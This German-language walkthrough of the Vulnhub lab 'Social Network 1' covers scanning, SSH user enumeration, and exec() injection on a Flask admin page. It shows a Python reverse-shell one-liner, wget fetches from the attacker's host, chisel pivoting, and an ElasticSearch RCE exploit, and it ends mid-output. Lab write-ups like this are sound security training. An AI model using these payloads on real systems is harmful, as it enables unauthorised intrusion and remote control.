BoredHackerBlog - Social Network 1 - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
wfuzz
dirb
curl
msfconsole
python3
searchsploit
chisel
socat
wget

Inhaltsverzeichnis

Reconnaissance

In dieser Phase sammeln wir Informationen über das Zielsystem. Wir beginnen mit einem ARP-Scan, um die IP-Adresse und MAC-Adresse des Ziels zu ermitteln. Danach fügen wir die IP-Adresse dem /etc/hosts hinzu, um die Kommunikation zu erleichtern.

┌──(root㉿CCat)-[~]
└─# arp-scan -l
192.168.2.117 08:00:27:a6:e2:ec PCS Systemtechnik GmbH
┌──(root㉿CCat)-[~]
└─# echo "192.168.2.117 boredhackerblog2.vln" >> /etc/hosts

Als nächstes führen wir einen Nmap-Scan durch, um offene Ports und Dienste auf dem Zielsystem zu identifizieren. Wir verwenden verschiedene Optionen, um den Scan zu optimieren und detailliertere Informationen zu erhalten.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh penSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0) 5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)

Wir wiederholen den Nmap-Scan ohne den Grep-Filter, um die vollständigen Ergebnisse zu erhalten. Dies gibt uns einen umfassenderen Überblick über die laufenden Dienste und Versionen.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 22:01 CEST
Nmap scan report for boredhackerblog2.vln (192.168.2.117)
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
22/tcp open ssh penSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
| 2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
| 256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_ 256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15
|_http-title: Leave a message
MAC Address: 08:00:27:A6:E2:EC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACERUTE
HP RTT ADDRESS
1 0.16 ms boredhackerblog2.vln (192.168.2.117)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.75 seconds

Wir verwenden Curl, um den HTTP-Header und den Inhalt der Webseite auf Port 5000 abzurufen. Dies hilft uns, die verwendete Technologie und mögliche Schwachstellen zu identifizieren.

┌──(root㉿CCat)-[~]
└─# curl --verbose http://192.168.2.117:5000 -s
* Trying 192.168.2.117:5000...
* Connected to 192.168.2.117 (192.168.2.117) port 5000
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 192.168.2.117:5000
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 644
< Server: Werkzeug/0.14.1 Python/2.7.15
< Date: Thu, 24 Oct 2024 20:05:10 GMT
<
Leave a message
Welcome to the new "Leave a message" social networking site
All the messages are anonymous. Don't worry, it's completely safe and secure
Messages

Hello!
Testin 123
This is a cool site
How do I contact the admin?
How is everyone doing?
Is anyone even using this?
' R sqlspider
ghz>hzx
hzx"zxc
zxc'xcv
form action="" method="PST"
.....
....
...
placeholder="Type your message here..."
* shutting down connection #0

Nikto wird verwendet, um das Ziel auf bekannte Schwachstellen zu scannen. Es identifiziert veraltete Software und fehlende Header, die ein Sicherheitsrisiko darstellen könnten.

┌──(root㉿CCat)-[~]
└─# nikto -h http://192.168.2.117:5000
- Nikto v2.5.0

+ Target IP: 192.168.2.117
+ Target Hostname: 192.168.2.117
+ Target Port: 5000
+ Start Time: 2024-10-24 22:03:32 (GMT+2)

+ Server: Werkzeug/0.14.1 Python/2.7.15
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Python/2.7.15 appears to be outdated (current is at least 3.9.6).
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-10-24 22:03:51 (GMT+2) (19 seconds)

+ 1 host(s) tested

Web Enumeration

Gobuster wird verwendet, um versteckte Verzeichnisse und Dateien auf dem Webserver zu finden. Die Option -b '503,404,403' filtert unerwünschte Statuscodes heraus, um die Ergebnisse zu optimieren.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x .txt,.php,.html,.d,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.117:5000/admin (Status: 200) [Size: 401]

Wir haben die Admin-Seite gefunden! Diese Seite könnte sensible Informationen oder Funktionen enthalten, die wir ausnutzen könnten.

http://192.168.2.117:5000/admin
Admin page
Code testing page
Nothing was ran. Input some code to exec()

Die Admin-Seite scheint eine Code-Testing-Funktion zu haben. Dies ist ein potenzielles Einfallstor für Remote Code Execution (RCE).

Um eine Datei auf den Server hochzuladen, starten wir einen einfachen HTTP-Server mit Python.

┌──(root㉿CCat)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Wir verwenden Metasploit, um SSH-Benutzernamen auf dem Zielsystem aufzuzählen. Dies könnte uns helfen, gültige Anmeldeinformationen für den SSH-Dienst zu finden.

┌──(root㉿CCat)-[~]
└─# msfconsole -q -x "search ssh_enum"
Matching Modules

# Name Disclosure Date Rank Check Description
- - - -- --
0 auxiliary/scanner/ssh/ssh_enumusers . normal No SSH Username Enumeration
1 \_ action: Malformed Packet . . . Use a malformed packet
2 \_ action: Timing Attack . . . Use a timing attack
3 auxiliary/scanner/ssh/ssh_enum_git_keys . normal No Test SSH Github Access


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/ssh/ssh_enum_git_keys
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_enumusers) > options
Module options (auxiliary/scanner/ssh/ssh_enumusers):

Name Current Setting Required Description
- -- --
CHECK_FALSE true no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the lis
t
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.
com/docs/using-metasploit/basics/using-metasploi
t.html
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per ho
st)
THRESHLD 10 yes Amount of seconds needed before a user is consid
ered found (timing attack only)
USERNAME no Single username to test (username spray)
USER_FILE no File containing usernames, one per line


Auxiliary action:

Name Description
- --
Malformed Packet Use a malformed packet
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.2.117
RHOSTS => 192.168.2.117
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 22
RPORT => 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THRESHLD 10
THRESHLD => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[+] 192.168.2.117:22 - SSH - User 'john' found
[+] 192.168.2.117:22 - SSH - User 'mail' found
[+] 192.168.2.117:22 - SSH - User 'root' found
[+] 192.168.2.117:22 - SSH - User 'news' found
[+] 192.168.2.117:22 - SSH - User 'man' found
[+] 192.168.2.117:22 - SSH - User 'bin' found

Metasploit hat erfolgreich SSH-Benutzernamen auf dem Zielsystem gefunden! Dies erhöht unsere Chancen, uns erfolgreich am System anzumelden.

Initial Access

Wir testen, ob die sleep-Funktion auf der Admin-Seite funktioniert. Dies ist ein einfacher Test, um zu sehen, ob wir Code ausführen können.

http://192.168.2.117:5000/admin
import subprocess
import time
process = subprocess.Popen(['sleep', '10'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr

Die sleep-Funktion funktioniert! Dies bestätigt, dass wir Code auf dem Zielsystem ausführen können.

Wir versuchen, eine Datei vom Zielsystem herunterzuladen, indem wir wget verwenden. Dies ist ein weiterer Test, um zu sehen, ob wir das System kompromittieren können.

┌──(root㉿CCat)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.2.117 - - [24/Oct/2024 22:43:14] "GET /user.txt HTTP/1.1" 200 -

Wir versuchen , die Datei herunterzuladen.

http://192.168.2.117:5000/admin
import subprocess
import time
process = subprocess.Popen(['wget', 'http://192.168.2.199/user.txt'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr
import subprocess
import time
process = subprocess.Popen(['wget', 'http://192.168.2.199/rce.php'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr

Wir versuchen, eine Reverse Shell einzubauen. Dies ist unser Ziel, um vollen Zugriff auf das System zu erhalten.

┌──(root㉿CCat)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
http://192.168.2.117:5000/admin
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.199",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Jaaaaaa! Wir haben eine Reverse Shell! Wir sind jetzt als root angemeldet! Fantastisch, der Root-Zugriff war erfolgreich, nun haben wir unser Ziel erreicht!

┌──(root㉿CCat)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.117] 46029
/app #
/app # which python
/usr/local/bin/python
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # ls /root
/app # ls -la /root
total 12
drwx 3 root root 4096 Oct 29 2018 .
drwxr-xr-x 43 root root 4096 Oct 24 20:43 ..
drwx 3 root root 4096 Oct 29 2018 .cache
/app # ls -la /root/.cache
total 12
drwx 3 root root 4096 Oct 29 2018 .
drwx 3 root root 4096 Oct 29 2018 ..
drwx 4 root root 4096 Oct 29 2018 pip
/app # grep sh /etc/passwd
root:x:0:0:root:/root:/bin/ash
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
operator:x:11:0:operator:/root:/bin/sh
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
postgres:x:70:70/var/lib/postgresql:/bin/sh
/app # cat /proc/1/cgroup
11:hugetlb:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
10:perf_event:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
9:blkio:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
8:freezer:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
7:devices:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
6:memory:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
5:cpuacct:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
4:cpu:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
3:cpuset:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
2:name=systemd:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
/app # ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7380854 errors:0 dropped:0 overruns:0 frame:0
TX packets:6888226 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:592167064 (564.7 MiB) TX bytes:811778913 (774(774.1 MiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
/app # cat /etc/issue
Welcome to Alpine Linux 3.8
Kernel \r on an \m (\l)

Privilege Escalation POC

Da wir eine Root-Shell erhalten haben, können wir nun versuchen, auf andere Systeme im Netzwerk zuzugreifen. Wir beginnen mit dem Pivoting-Prozess.

Wir verwenden Chisel für Port Forwarding.

/app # ss -altpn
/bin/sh: ss: not found
/app # netstat -altpn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN 9693/netstat
tcp 0 54 172.17.0.2:46029 192.168.2.199:4444 ESTABLISHED 9693/netstat
tcp 0 0 172.17.0.2:5000 192.168.2.199:35604 ESTABLISHED 9693/netstat
/app # ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0: mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever

Wir laden Nmap auf das Zielsystem hoch, um weitere Ports zu scannen.

┌──(root㉿CCat)-[~/Hackingtools/shells]
└─# mv /home/ccat/Downloads/nmap .
┌──(root㉿CCat)-[~/Hackingtools/shells]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.2.117 - - [24/Oct/2024 23:05:18] "GET /nmap HTTP/1.1" 200 -
/app # wget 192.168.2.199/nmap
Connecting to 192.168.2.199 (192.168.2.199:80)
nmap 100% |******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************| 5805k 0:00:00 ETA
/app # chmod +x nmap
/app # ./nmap
Nmap 6.49BETA1 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file


Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-10-24 21:06 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 110a80582af7 (172.17.0.2)
Host is up (0.000033s latency).
All 1289 scanned ports on 110a80582af7 (172.17.0.2) are closed

Wir laden ein weiteres Shell-Skript (spookyscan.sh) hoch, um Ports zu scannen.

chmod +x ./spookyscan.sh
./spookyscan.sh -i 192.168.1.1 -p 1024
#!/bin/bash
#Variables
empty=""
#Arguments for the script
while [ "$1" != "" ]; do
case "$1" in
-i | --ip ) ip="$2"; shift;;
-p | --ports ) ports="$2"; shift;;
esac
shift
done
#Checking if the -i is empty
if [[ $ip $empty ]]; then
echo "Please specify an IP address with -i"
exit
fi
#checking is -p is empty
if [[ $ports $empty ]]; then
echo "Please specify the max port range -p"
exit
fi
#Scans ports/Dumps closed ports/displays open ports
for i in $(seq 1 $ports); do
( echo > /dev/tcp/$ip/$i) > /dev/null 2>&1 && echo $ip":"$i "is open";
done

Wir versuchen, eine interaktive Shell mit Python zu starten, aber es schlägt fehl.

/app # /usr/local/bin/python -c 'import pty;pty.spawn("/bin/bash")'
Traceback (most recent call last):
File "", line 1, in
File "/usr/local/lib/python2.7/pty.py", line 167, in spawn
os.execlp(argv[0], *argv)
File "/usr/local/lib/python2.7/os.py", line 329, in execlp
execvp(file, args)
File "/usr/local/lib/python2.7/os.py", line 346, in execvp
_execvpe(file, args)
File "/usr/local/lib/python2.7/os.py", line 370, in _execvpe
func(file, *argrest)
OSError: [Errno 2] No such file or directory

Wir listen die Dateien im aktuellen Verzeichnis auf.

/app # ls -la
total 5844
drwxr-xr-x 3 root root 4096 Oct 24 21:15 .
drwxr-xr-x 43 root root 4096 Oct 24 20:43 ..
-rw-r--r-- 1 root root 182 Oct 29 2018 Dockerfile
-rw-r--r-- 1 root root 1326 Oct 29 2018 main.py
-rwxr-xr-x 1 root root 5944464 Oct 24 21:05 nmap
-rw-r--r-- 1 root root 46 Oct 24 20:44 rce.php
-rw-r--r-- 1 root root 6 Oct 28 2018 requirements.txt
-rwxr-xr-x 1 root root 566 Oct 24 21:15 spookyscan.sh
drwxr-xr-x 2 root root 4096 Oct 29 2018 templates
-rw-r--r-- 1 root root 35 Oct 24 20:43 user.txt

Wir zeigen den Inhalt der main.py-Datei an.

/app # cat main.py
from flask import Flask, request
from flask import render_template

app = Flask(__name__)

message_list = ["Hello!", "Testin 123", "This is a cool site", "How do I contact the admin?", "How is everyone doing?", "Is anyone even using this?"]

@app.route('/',methods=['POST', 'GET'])
def index():
if request.method == 'GET':
return render_template('index.html',message_list=message_list)
if request.method == 'POST':
if len(request.form['message']) > 3:
message_list.append(request.form['message'])
return render_template('index.html',message_list=message_list)
else:
return "Message not long enough"

@app.route('/admin',methods=['POST', 'GET'])
def admin():
if request.method == 'GET':
return render_template('admin.html',output="Nothing was ran. Input some code to exec()")
if request.method == 'POST':
if len(request.form['code']) > 3:
try:
exec(request.form['code'])
return render_template('admin.html',output="Ran the code")
except:
return render_template('admin.html',output="Something went wrong with running the code")
else:
return "Code not long enough"

if __name__ == '__main__':
app.run(host="0.0.0.0",port=5000,threaded=True)

Wir rufen den Hostnamen ab.

/app # hostname -i
172.17.0.2

Wir führen einen Nmap-Scan durch, um andere Hosts im Netzwerk zu finden.

/app # ./nmap -sn 172.17.0.2/24 -T5 -n
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-10-24 21:24 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.0000090s latency).
MAC Address: 02:42:18:13:A9:96 (Unknown)
Nmap scan report for 172.17.0.3
Host is up (0.0000080s latency).
MAC Address: 02:42:AC:11:00:03 (Unknown)
Nmap scan report for 172.17.0.2
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.03 seconds

Wir scannen Port 9200 auf einem anderen Host.

/app # ./nmap -Pn -n -T5 172.17.0.3 -p-
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-10-24 21:26 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Host is up (0.000014s latency).
PORT STATE SERVICE
9200/tcp open wap-wsp
9300/tcp open unknown
MAC Address: 02:42:AC:11:00:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds

Wir suchen nach Informationen über Port 9200.

https://www.google.de/search?q=9200%252Ftcp+open++wap-wsp+
9200 - Pentesting Elasticsearch - HackTricks
HackTricks
https://book.hacktricks.xyz › network-services-pentesting
Jul 19, 2024 — Elasticsearch is a distributed, open source search and analytics engine for all types of data. It is known for its speed, scalability, and simple REST APIs.
‎What is an Elasticsearch index? · ‎Authentication · ‎Indices · ‎Dump index

Elasticsearch wurde gefunden! Wir versuchen, Informationen von Elasticsearch abzurufen.

/app # wget 172.17.0.3:9200
Connecting to 172.17.0.3:9200 (172.17.0.3:9200)
{
"status" : 200,
"name" : "Drax the Destroyer",
"cluster_name" : "elasticsearch",
"version" : {
"number" : "1.4.2",
"build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
"build_timestamp" : "2014-12-16T14:11:12Z",
"build_snapshot" : false,
"lucene_version" : "4.10.2"
},
"tagline" : "You Know, for Search"
}
- 100% |******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************| 346 0:00:00 ETA
/app # ls -la
total 5844
drwxr-xr-x 3 root root 4096 Oct 24 21:15 .
drwxr-xr-x 43 root root 4096 Oct 24 20:43 ..
-rw-r--r-- 1 root root 182 Oct 29 2018 Dockerfile
-rw-r--r-- 1 root root 1326 Oct 29 2018 main.py
-rwxr-xr-x 1 root root 5944464 Oct 24 21:05 nmap
-rw-r--r-- 1 root root 46 Oct 24 20:44 rce.php
-rw-r--r-- 1 root root 6 Oct 28 2018 requirements.txt
-rwxr-xr-x 1 root root 566 Oct 24 21:15 spookyscan.sh
drwxr-xr-x 2 root root 4096 Oct 29 2018 templates
-rw-r--r-- 1 root root 35 Oct 24 20:43 user.txt

Wir zeigen den Inhalt der user.txt-Datei an.

/app # cat user.txt
admin
graham
sarah
jens
mark
vince

Wir suchen nach Exploits für Elasticsearch.

┌──(root㉿CCat)-[~/Hackingtools/shells]
└─# searchsploit elasticsearch
Exploit Title | Path
---------------------------------------------------------+------------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit) | java/remote/36415.rb
Elasticsearch - Stackverflow DoS | multiple/dos/51787.txt
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Me | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py

Shellcodes: No Results

Wir kopieren einen Exploit auf unser System.

┌──(root㉿CCat)-[~]
└─# searchsploit -m linux/remote/36337.py
Exploit: ElasticSearch - Remote Code Execution
URL: https://www.exploit-db.com/exploits/36337
Path: /usr/share/exploitdb/exploits/linux/remote/36337.py
Codes: CVE-2015-1427, SVDB-118239
Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /root/36337.py
┌──(root㉿CCat)-[~]
└─# mv /root/36337.py elasticsearch.py
┌──(root㉿CCat)-[~]
└─# ll ela*
-rwxr-xr-x 1 root root 3278 Oct 24 23:46 elasticsearch.py

Wir führen den Exploit aus.

┌──(root㉿CCat)-[~]
└─# python2 elasticsearch.py
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██ ▒██ ▀█▄ ▓██▄ ▒ ▓██ ▒▒██▒▒▓█ ▄ ▓██▄ ▒██▀▀██▒███ ▒██ ▒██
▒▓█ ▄ ▒██ ██▄▄▄▄██ ▒ ██▒ ▓██▓ ██▒▓▓▄ ▄██▒ ▒ ██▒▓█ ██ ▒▓█ ▄ ▒██ ▒██
▒████▒██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ██▒ ▓███▀ ▒██████▒▒▓█▒██▓▒████▒██████▒██████▒
▒ ▒▓ ▒▒ ▓▒█▒ ▒▓▒ ▒ ▒ ▓ ▒ ▒ ▒ ▒▓▒ ▒ ▒ ▒▒ ▒ ▒▓ ▒▓ ▒
▒ ▒ ▒▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒
▒ ▒
Use: elasticsearch.py target

Wir verwenden Chisel für Port Forwarding.

┌──(root㉿CCat)-[~]
└─# cd Hackingtools/chisel
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# ll
total 8740
-rwsrwsr-x 1 ccat ccat 8945816 Aug 25 00:43 chisel
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# ./chisel server --reverse -p 1234
2024/10/24 23:53:34 server: Reverse tunnelling enabled
2024/10/24 23:53:34 server: Fingerprint gu/VwB1NgcKTNg+mhMVr0iodyncyhNbi6WN+mszX4I=
2024/10/24 23:53:34 server: Listening on http://0.0.0.0:1234
/app # chmod +x chisel
/app # ./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200
2024/10/24 21:54:30 client: Connecting to ws://192.168.2.199:1234
2024/10/24 21:54:30 client: Connected (Latency 380.358µs)
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# ./chisel server --reverse -p 1234
2024/14/10/24 23:53:34 server: Reverse tunnelling enabled
2024/10/24 23:53:34 server: Fingerprint gu/VwB1NgcKTNg+mhMVr0iodyncyhNbi6WN+mszX4I=
2024/10/24 23:53:34 server: Listening on http://0.0.0.0:1234
2024/10/24 23:54:30 server: session#1: tun: proxy#R:9200=>172.17.0.3:9200: Listening
192.168.2.199:9200
status 200
name "Drax the Destroyer"
cluster_name "elasticsearch"
version
number "1.4.2"
build_hash "927caff6f05403e936c20bf4529f144f0c89fd8c"
build_timestamp "2014-12-16T14:11:12Z"
build_snapshot false
lucene_version "4.10.2"
tagline "You Know, for Search"

Wir versuchen, Informationen von Elasticsearch über den Tunnel abzurufen.

┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/_cat/indices?v
health status index pri rep docs.count docs.deleted store.size pri.store.size
yellow open blog 5 1 1 0 3kb 3kb
┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/blog | tr "," "\n"
{"blog":{"mappings":{"user":{"properties":{"name":{"type":"string"}}}}
"settings":{"index":{"creation_date":"1729799457745"
"uuid":"3kdJIs98QBKAcfQBq7ZVFA"
"number_of_replicas":"1"
"number_of_shards":"5"
"version":{"created":"1040299"}}}}}
┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/blog | jq
{
"blog": {
"mappings": {
"user": {
"properties": {
"name": {
"type": "string"
}
}
}
},
"settings": {
"index": {
"creation_date": "1729799457745",
"uuid": "3kdJIs98QBKAcfQBq7ZVFA",
"number_of_replicas": "1",
"number_of_shards": "5",
"version": {
"created": "1040299"
}
}
}
}
}
┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/blog/_search?pretty=true | jq
{
"took": 21,
"timed_out": false,
"_shards": {
"total": 5,
"successful": 5,
"failed": 0
},
"hits": {
"total": 1,
"max_score": 1.0,
"hits": [
{
"_index": "blog",
"_type": "user",
"_id": "dilbert",
"_score": 1.0,
"_source": {
"name": "Dilbert Brown"
}
}
]
}
}

Wir führen den Elasticsearch-Exploit aus.

┌──(root㉿CCat)-[~]
└─# python2 elasticsearch.py 192.168.2.199
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██ ▒██ ▀█▄ ▓██▄ ▒ ▓██ ▒▒██▒▒▓█ ▄ ▓██▄ ▒██▀▀██▒███ ▒██ ▒██
